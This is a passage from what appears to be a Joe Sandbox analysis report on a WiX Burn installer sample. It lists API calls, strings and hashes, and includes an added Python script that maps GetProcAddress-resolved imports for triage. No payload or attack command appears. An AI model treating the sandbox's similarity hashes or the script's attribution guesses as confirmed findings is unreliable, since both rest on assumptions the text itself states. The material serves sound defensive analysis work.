• d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\regutil.cpp, xrefs: 0096C8E5
• AdvApi32.dll, xrefs: 0096C8C9
• RegDeleteKeyExW, xrefs: 0096C8F4
• RegGetValueW, xrefs: 0096C905
• Failed to load AdvApi32.dll, xrefs: 0096C8D9
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: AddressProc$ErrorLastLibraryLoad
• String ID: AdvApi32.dll$Failed to load AdvApi32.dll$RegDeleteKeyExW$RegGetValueW$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\regutil.cpp
• API String ID: 856020675-1672349681
• Opcode ID: 36e1bd0b920fe55c94c7cb55653b77133c835add3ed5b4fd06da29bb33c7b3ab
• Instruction ID: 212f611aaa4a0d08121dc3d06f97a9838637e64e849dd01f5044d5ad4902d9f2
• Opcode Fuzzy Hash: 36e1bd0b920fe55c94c7cb55653b77133c835add3ed5b4fd06da29bb33c7b3ab
• Instruction Fuzzy Hash: E3F04FF1AAF314AAE7145F35EC09B903A64AB57B59F050215F50E56AE0E7B04881EBC0
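Several of the function listings above resolve their Win32 imports at run time rather than through the import table: GetProcAddress with the target name and DLL as visible string arguments (PathAllocCanonicalize, SRSetRestorePointW, RegDeleteKeyExW, RegGetValueW), a GetModuleHandleW/GetProcAddress pair for Wow64DisableWow64FsRedirection, and one GetProcAddress whose name argument the sandbox could not resolve. Pulling those dynamically resolved imports out of a report of this size by hand is error-prone, so the following script, an added example that is not part of the Joe Sandbox report or of the analysed sample, parses the "APIs" lines in the sandbox's own notation and builds a DLL-to-procedure map. The sample input is constructed from the listings above; the line grammar (bullet, optional "Part of subcall function", `Api.MODULE(args), ref: ADDR`) and the rule for attributing a bare `GetProcAddress(Name)` to the most recent DLL named in the same listing are assumptions about the report format, not documented Joe Sandbox behaviour.

```python
import re
from collections import defaultdict

# Constructed sample input: API lines copied from the function listings in
# this report, trimmed to their leading arguments. Four "APIs" headers mark
# four separate function listings.
SAMPLE_LISTING = """\
APIs
• GetProcAddress.KERNEL32(PathAllocCanonicalize,api-ms-win-core-path-l1-1-0.dll), ref: 00971B7E
• GetLastError.KERNEL32(?,?,00971D45,00000000), ref: 00971B8D
APIs
  • Part of subcall function 00911839: LoadLibraryExW.KERNEL32(?,00000000,00000800,00000000), ref: 00911855
• GetProcAddress.KERNEL32(SRSetRestorePointW,srclient.dll), ref: 0096E0B5
APIs
• GetModuleHandleW.KERNEL32(kernel32,Wow64DisableWow64FsRedirection,00916DEA), ref: 0096B711
• GetProcAddress.KERNEL32(00000000), ref: 0096B718
APIs
• GetProcAddress.KERNEL32(RegDeleteKeyExW,AdvApi32.dll), ref: 0096C8FF
• GetProcAddress.KERNEL32(RegGetValueW), ref: 0096C915
"""

# Assumed line grammar: optional bullet, optional subcall prefix,
# Api.MODULE(arg,arg,...), ref: 8-hex-digit address.
API_LINE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<module>[\w-]+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)
HEX_ARG = re.compile(r"^[0-9A-F]{8}$")


def parse_api_calls(text):
    """Return one dict per API line: api, module, args, ref, subcall, block.

    'block' counts "APIs" headers so callers can tell listings apart.
    """
    calls, block = [], 0
    for line in text.splitlines():
        if line.strip() == "APIs":
            block += 1
            continue
        m = API_LINE.match(line)
        if not m:
            continue  # Strings / Memory Dump Source / hash lines are skipped
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append({"api": m.group("api"), "module": m.group("module"),
                      "args": args, "ref": m.group("ref"),
                      "subcall": m.group("sub"), "block": block})
    return calls


def _is_symbolic(arg):
    # The sandbox prints resolved string arguments as text, numeric ones as
    # 8-digit hex and unknown ones as '?'; only text is useful here.
    return bool(arg) and arg != "?" and not HEX_ARG.match(arg)


def dynamic_imports(calls):
    """Map DLL name -> sorted procedure names resolved through GetProcAddress.

    DLL attribution, in order: the second GetProcAddress argument when it is a
    string; otherwise the last DLL named by GetModuleHandleW, LoadLibraryExW
    or an earlier GetProcAddress in the same listing; otherwise 'unknown'.
    A GetProcAddress whose name argument is a handle or hex value is kept
    under 'unresolved' (by call site) so it is not silently dropped.
    """
    result = defaultdict(set)
    last_dll, cur_block = None, None
    for c in calls:
        if c["block"] != cur_block:          # new listing: forget context
            last_dll, cur_block = None, c["block"]
        args = c["args"]
        if c["api"] in ("GetModuleHandleW", "LoadLibraryExW", "LoadLibraryW"):
            if args and _is_symbolic(args[0]):
                last_dll = args[0]
            # GetModuleHandleW(kernel32, Wow64DisableWow64FsRedirection, ...)
            # shows the proc name as stack residue; record it too.
            if c["api"] == "GetModuleHandleW" and len(args) > 1 and _is_symbolic(args[1]):
                result[last_dll or "unknown"].add(args[1])
            continue
        if c["api"] != "GetProcAddress":
            continue
        name = args[0] if args else ""
        if not _is_symbolic(name):
            result["unresolved"].add(c["ref"])
            continue
        if len(args) > 1 and _is_symbolic(args[1]):
            last_dll = args[1]
        result[last_dll or "unknown"].add(name)
    return {dll: sorted(names) for dll, names in result.items()}


if __name__ == "__main__":
    for dll, names in sorted(dynamic_imports(parse_api_calls(SAMPLE_LISTING)).items()):
        print(f"{dll}: {', '.join(names)}")
```

Run against a full report export, the `unresolved` bucket is the part worth a second look: those are GetProcAddress calls whose target name lived in a register or was built at run time, which is exactly where an import the author did not want visible would be resolved.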
Strings
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID:
• String ID: Aborted cache verify payload signature begin.$Failed authenticode verification of payload: %ls$Failed to get provider state from authenticode certificate.$Failed to get signer chain from authenticode certificate.$Failed to verify expected payload against actual certificate chain.$d:\a\wix4\wix4\src\burn\engine\cache.cpp
• API String ID: 0-338742995
• Opcode ID: d69f9ab864f66961d99fc5448b18ef64ebf9e166f1d5393f1093e88ba3c31370
• Instruction ID: 513786e323a010b1b53908de02f120e5b83187641436d92d79114fb1dc9d79bb
• Opcode Fuzzy Hash: d69f9ab864f66961d99fc5448b18ef64ebf9e166f1d5393f1093e88ba3c31370
• Instruction Fuzzy Hash: 7451C3B2D41229BBDB11DB98DC46FEFBAB8AF48710F114119F904BB291E7749D009BE1
APIs
  • Part of subcall function 00916305: CreateDirectoryW.KERNELBASE(00000001,?,00000001,00000000,?,0092ED80,00000000,00000000,?,00000021,00000000,00000000,A0000013,00000000,00000000,00000000), ref: 00916313
  • Part of subcall function 00916305: GetLastError.KERNEL32(?,0092ED80,00000000,00000000,?,00000021,00000000,00000000,A0000013,00000000,00000000,00000000,00000000,?,00000021,00000000), ref: 00916321
• lstrlenA.KERNEL32(?,00000000,?,00000000,?,?,?,?,swidtag,?,?,?,?,00000000), ref: 00927D78
  • Part of subcall function 00973EAD: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,?,00000000,?,00000000,?,00927D8F,?,00000080,?,00000000), ref: 00973EC5
  • Part of subcall function 00973EAD: GetLastError.KERNEL32(?,00000000,?,00927D8F,?,00000080,?,00000000,?,?,?,swidtag,?,?,?,?), ref: 00973ED2
Strings
• Failed to allocate regid file path., xrefs: 00927DEE
• Failed to format tag folder path., xrefs: 00927E16
• Failed to allocate regid folder path., xrefs: 00927E02
• d:\a\wix4\wix4\src\burn\engine\registration.cpp, xrefs: 00927DDF, 00927E28
• swidtag, xrefs: 00927D34
• Failed to write tag xml to file: %ls, xrefs: 00927DB6
• Failed to create regid folder: %ls, xrefs: 00927DCD
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: CreateErrorLast$DirectoryFilelstrlen
• String ID: Failed to allocate regid file path.$Failed to allocate regid folder path.$Failed to create regid folder: %ls$Failed to format tag folder path.$Failed to write tag xml to file: %ls$d:\a\wix4\wix4\src\burn\engine\registration.cpp$swidtag
• API String ID: 583680227-1772413233
• Opcode ID: 3a45829c1e6eeb899c8d52d00953c3f9fefbea250865497cf5a6f1b350c42b04
• Instruction ID: 6da6369c37281047394282e4019bb34c9151e4e4e10a0e7ae2270762b9a7eafa
• Opcode Fuzzy Hash: 3a45829c1e6eeb899c8d52d00953c3f9fefbea250865497cf5a6f1b350c42b04
• Instruction Fuzzy Hash: 0C41F731E44628BBDB11AA94DC07FAFFA75EF44B10F618191B6107A2E0D7B15E509BA0
APIs
• EnterCriticalSection.KERNEL32(7FFFFFFE,00000000,00000000,00000000,?,?,?,009185FC,00000000,?,00000000,?,00000000,?,0092A80F), ref: 00918B82
• LeaveCriticalSection.KERNEL32(7FFFFFFE,7FFFFFFE,?,7FFFFFFE,?,009185FC,00000000,?,00000000,?,00000000,?,0092A80F,?,00000001,00000000), ref: 00918C9E
Strings
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: CriticalSection$EnterLeave
• String ID: *****$Failed to format value '%ls' of variable: %ls$Failed to get unformatted string.$Failed to get value as string for variable: %ls$Failed to get variable: %ls$d:\a\wix4\wix4\src\burn\engine\variable.cpp
• API String ID: 3168844106-1256323647
• Opcode ID: 529b1d9628f9477e70992e1bff56ff31d53d8555f751677567d0d60d1323ea53
• Instruction ID: 0c80b5036e0ca7dff33c9876ffa8fdd7c8487177e5f1f2a247258db78d6613a9
• Opcode Fuzzy Hash: 529b1d9628f9477e70992e1bff56ff31d53d8555f751677567d0d60d1323ea53
• Instruction Fuzzy Hash: 8031D672B4171DBBDF216F50CC46EDB7A68AB54750F004560FA04AA290DBB0AED0ABE0
APIs
• GetWindowLongW.USER32(?,000000EB), ref: 0093D01D
• DefWindowProcW.USER32(?,?,?,?), ref: 0093D095
• PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0093D0AC
  • Part of subcall function 0093CE40: SetWindowPos.USER32(00000000,00000000,?,?,?,00000000,00000014,?,00000060,?,?,00000000,?,0093CD2A,?,00000060), ref: 0093CE7E
• DefWindowProcW.USER32(?,00000082,?,?), ref: 0093D0C3
• SetWindowLongW.USER32(?,000000EB,00000000), ref: 0093D0D1
• PostQuitMessage.USER32(00000000), ref: 0093D0D8
• SetWindowLongW.USER32(?,000000EB,00000000), ref: 0093D0EC
• DefWindowProcW.USER32(?,?,?,?,?,00000000), ref: 0093D11C
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: Window$LongProc$MessagePost$Quit
• String ID:
• API String ID: 3225497149-0
• Opcode ID: be54e7ce6d7512204a599bc9af587bf9cd8dacf86905b6160d88829ae131654c
• Instruction ID: 025ba0c4f2a419d200c645edaded479e3ebbddbcf1019a791f5a2b9c6f35d30a
• Opcode Fuzzy Hash: be54e7ce6d7512204a599bc9af587bf9cd8dacf86905b6160d88829ae131654c
• Instruction Fuzzy Hash: 0C31AF72109205BBDB299FB9AC68E6B7FBDEF89710F004A18F507961A1C7349911EF60
APIs
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: _strrchr
• String ID:
• API String ID: 3213747228-0
• Opcode ID: 7eaf186ae0cbf7de8f6fa16e82fe6069b98ea90ea005d767dd8ae63d22e784bf
• Instruction ID: 3a0adb69e55cc362166af2fa60cf88d20fba13610a4b8197cfafe6daede05904
• Opcode Fuzzy Hash: 7eaf186ae0cbf7de8f6fa16e82fe6069b98ea90ea005d767dd8ae63d22e784bf
• Instruction Fuzzy Hash: 2FB17A729003559FDB11CF25CCA1BAE7BA9EF55321F2441B5ED48AF282E3749909C7A0
APIs
• GetLastError.KERNEL32(?,?,?,00977F53,00000000,00000000,00978702,00000000,00000000,00000000,00000000,00000001,?,00000000,?,00000000), ref: 009781E8
Strings
• Failed to get HTTP status code for request to URL: %ls, xrefs: 009783BE
• d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\dlutil.cpp, xrefs: 009783CD
• Unknown HTTP status code %d, returned from URL: %ls, xrefs: 00978381
• Failed to get HTTP status code for failed request to URL: %ls, xrefs: 00978221
• Failed to send request to URL: %ls, trying to process HTTP status code anyway., xrefs: 009781FF
• Failed to get redirect url: %ls, xrefs: 009783AB
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: ErrorLast
• String ID: Failed to get HTTP status code for failed request to URL: %ls$Failed to get HTTP status code for request to URL: %ls$Failed to get redirect url: %ls$Failed to send request to URL: %ls, trying to process HTTP status code anyway.$Unknown HTTP status code %d, returned from URL: %ls$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\dlutil.cpp
• API String ID: 1452528299-2050984236
• Opcode ID: 5373890dc7ddf543a133769529dcba98606bdfe61a133c8d9b0e199e6e07ae09
• Instruction ID: 145ca74a8bc0959d93d7426e4af8d706dbf7f1dc00b05989c170614958f1a1a0
• Opcode Fuzzy Hash: 5373890dc7ddf543a133769529dcba98606bdfe61a133c8d9b0e199e6e07ae09
• Instruction Fuzzy Hash: D3513573AC0516ABDB254E6CCC0EF6F3A5CEB81B50F14C665B91DEB2A0DE65CD009291
                                                                                                                                                                  APIs
                                                                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,00000000,00000000,clbcatq.dll,00000000,clbcatq.dll,00000000,00000000,00000000), ref: 0097B9D2
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0097B9DC
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Time$ErrorFileLastSystem
                                                                                                                                                                  • String ID: Failed to convert system time to file time.$Failed to copy time.$clbcatq.dll$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\timeutil.cpp
                                                                                                                                                                  • API String ID: 2781989572-1833903446
                                                                                                                                                                  • Opcode ID: a7ba40f5b56ec59a137c5dcbf8b03ed841f80487006eac8f4c44026925d6c0d7
                                                                                                                                                                  • Instruction ID: ee158a7d2d161968c6233dee835926daf3d8a6edc00365afecbf2050697d6cc6
                                                                                                                                                                  • Opcode Fuzzy Hash: a7ba40f5b56ec59a137c5dcbf8b03ed841f80487006eac8f4c44026925d6c0d7
                                                                                                                                                                  • Instruction Fuzzy Hash: 5A41F563B5021976D7249B748C46FBFA66DEF91709F00C919F719BB2D0E6748E4083A1
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00977F34,00000000,00000000,00000001), ref: 009780F0
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00977F34,00000000,00000000,00000001), ref: 00978152
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast
                                                                                                                                                                  • String ID: Failed to add header to HTTP request.$Failed to allocate string for resource URI.$Failed to append query strong to resource from URI.$Failed to open internet request.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\dlutil.cpp
                                                                                                                                                                  • API String ID: 1452528299-283382383
                                                                                                                                                                  • Opcode ID: bca91b3490dd4318a43922caaef2ee64a89b08082c859244fd3249d336f7cf31
                                                                                                                                                                  • Instruction ID: ccfb3e6c676f41a213885157fb9c6ca40983f99f2b217593d6feea9aa052117a
                                                                                                                                                                  • Opcode Fuzzy Hash: bca91b3490dd4318a43922caaef2ee64a89b08082c859244fd3249d336f7cf31
                                                                                                                                                                  • Instruction Fuzzy Hash: 6F413D737C4329BBEB315A548C4EFAB755CAF45754F028524BE18BB191EAB0CC0192F0
                                                                                                                                                                  APIs
                                                                                                                                                                  • Sleep.KERNEL32(000007D0,009331C1,009331C1), ref: 0092D3BF
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Sleep
                                                                                                                                                                  • String ID: Failed to calculate cache path.$Failed to get %hs package cache root directory.$Failed to get old %hs package cache root directory.$d:\a\wix4\wix4\src\burn\engine\cache.cpp$per-machine$per-user
                                                                                                                                                                  • API String ID: 3472027048-1762823252
                                                                                                                                                                  • Opcode ID: 1c93f146a7ff1dbaca893edc94dc21fb8730d72fb6c5db0a5d0fef398e1ea896
                                                                                                                                                                  • Instruction ID: 9f4303f4597044a6ddc59095b99fc1ece82189f7ac51042de8bc32dfe9f653a3
                                                                                                                                                                  • Opcode Fuzzy Hash: 1c93f146a7ff1dbaca893edc94dc21fb8730d72fb6c5db0a5d0fef398e1ea896
                                                                                                                                                                  • Instruction Fuzzy Hash: 25415872B42338BBFB21BA55DC07FBF265C9B80754F054021BE04FA2E5E6B49D4097A1
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memcpy_s
                                                                                                                                                                  • String ID: Error reading wix version registry value due to unexpected data type: %u$Failed to convert registry string to wix version.$Failed to copy QWORD wix version value.$Failed to read wix version registry value.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\regutil.cpp
                                                                                                                                                                  • API String ID: 2001391462-1929277467
                                                                                                                                                                  • Opcode ID: 337aed46127230b5095d012965fda9eacefd9aca62e1f3799c7883c91a45d7cc
                                                                                                                                                                  • Instruction ID: 78ce1131d04c6438f96603860cd4235b1389a26b0298e16afaba51b90eb3881e
                                                                                                                                                                  • Opcode Fuzzy Hash: 337aed46127230b5095d012965fda9eacefd9aca62e1f3799c7883c91a45d7cc
                                                                                                                                                                  • Instruction Fuzzy Hash: 5C41D771F41318B6DB219B848C4AFEFBAB8DFC5B14F104056FA14762D1E7B45E40DAA1
                                                                                                                                                                  APIs
                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00959387
                                                                                                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 0095938F
                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00959418
                                                                                                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 00959443
                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00959498
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                  • String ID: csm
                                                                                                                                                                  • API String ID: 1170836740-1018135373
                                                                                                                                                                  • Opcode ID: ef0fb39fc481e0ac66b4c7518b7d195fb8a4968b8feac4dce7ec01eab364338e
                                                                                                                                                                  • Instruction ID: cabdbfc31a2c69cfa2141dbb96d2702a20feef43abfef98d0114f9ac8f2fc370
                                                                                                                                                                  • Opcode Fuzzy Hash: ef0fb39fc481e0ac66b4c7518b7d195fb8a4968b8feac4dce7ec01eab364338e
                                                                                                                                                                  • Instruction Fuzzy Hash: AF41A134A00218EBDF10DF6AC884A9EBBB9BF45319F148155EC195B3A2D735AD0ACB90
                                                                                                                                                                  APIs
                                                                                                                                                                  • RegQueryInfoKeyW.ADVAPI32(?,?,00928EB7,?,?,?,?), ref: 0096D584
                                                                                                                                                                  • RegEnumValueW.ADVAPI32(?,?,00928EB7,?,?,?,?), ref: 0096D609
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: EnumInfoQueryValue
                                                                                                                                                                  • String ID: Failed to allocate array for registry value name$Failed to enumerate registry value$Failed to get max size of value name under registry key.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\regutil.cpp
                                                                                                                                                                  • API String ID: 918324718-3509199686
                                                                                                                                                                  • Opcode ID: e77e6ccc2199c052a908f3a4a553394b885e3bb4bb653e0696d70852991fb961
                                                                                                                                                                  • Instruction ID: 6e017f90925e992a098f69d7581bbc0fdaaf4cfa388d8c082411e55ce44c843b
